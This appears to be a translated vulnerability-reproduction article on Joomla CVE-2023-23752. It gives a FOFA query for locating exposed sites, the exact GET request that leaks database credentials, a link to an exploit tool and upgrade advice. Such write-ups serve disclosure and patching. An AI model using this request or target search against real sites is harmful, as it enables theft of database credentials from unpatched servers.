Directorio de artículos
Joomla tiene una vulnerabilidad de acceso no autorizado CVE-2023-23752
Descargo de responsabilidad: No utilice las tecnologías relevantes en este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo correrán a cargo del propio usuario. Las consecuencias adversas tienen nada que ver con el autor del artículo. Este artículo es sólo para fines educativos.
1. Introducción a la vulnerabilidad de acceso no autorizado a Joomla
Búsqueda de cuenta oficial de WeChat: Biblioteca de reaparición de vulnerabilidades de Nanfeng
Este artículo se publicó por primera vez en la cuenta oficial de la Biblioteca de reproducción de vulnerabilidades de Nanfeng
Joomla es un sistema de gestión de contenidos (CMS) multiplataforma de código abierto desarrollado por el equipo de Open Source Matters en los Estados Unidos utilizando PHP y MySQL.
2. Descripción de la vulnerabilidad
Joomla es un sistema de gestión de contenidos (CMS) multiplataforma de código abierto desarrollado con PHP y MySQL. ApiRouter.php#parseApiRoute en Joomla 4.0.0 a 4.2.7 no filtra eficazmente los parámetros de solicitud al procesar la solicitud Get del usuario, por lo que el atacante puede enviar una solicitud que contenga parámetros public=true al punto final del servicio Joomla (como: / api/index.php/v1/config/application?public=true&key=value) para acceso no autorizado
Número CVE: CVE-2023-23752
Número CNNVD: CNNVD-202302-1375
Número CNVD:
3. Afecta la versión
Joomla 4.0.0 a 4.2.7 tiene una vulnerabilidad de seguridad
4. declaración de consulta fofa
aplicación = “Joomla”
5. Recurrencia de la vulnerabilidad
Enlace de vulnerabilidad: http://xxxx.com/api/index.php/v1/config/application?public=true
Paquete de datos de vulnerabilidad:
GET http://xxxx.com/api/index.php/v1/config/application?public=true HTTP/1.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Filtración de nombres de usuario, contraseñas, hosts, etc. de bases de datos.
Herramienta de explotación: https://github.com/Pari-Malam/CVE-2023-23752
6.POC&EXP
Dirección de la herramienta Exp: https://github.com/Pari-Malam/CVE-2023-23752
Si no puede abrir GitHub, puede seguir la cuenta oficial Nanfeng Vulnerability Recurrence Library y responder Vulnerability Reproduce 33 para descargar la herramienta POC. DIRECCIÓN.
7. Opiniones de rectificación
Actualmente, la vulnerabilidad se ha solucionado y los usuarios afectados pueden actualizar a Joomla! CMS versión 4.2.8 a tiempo.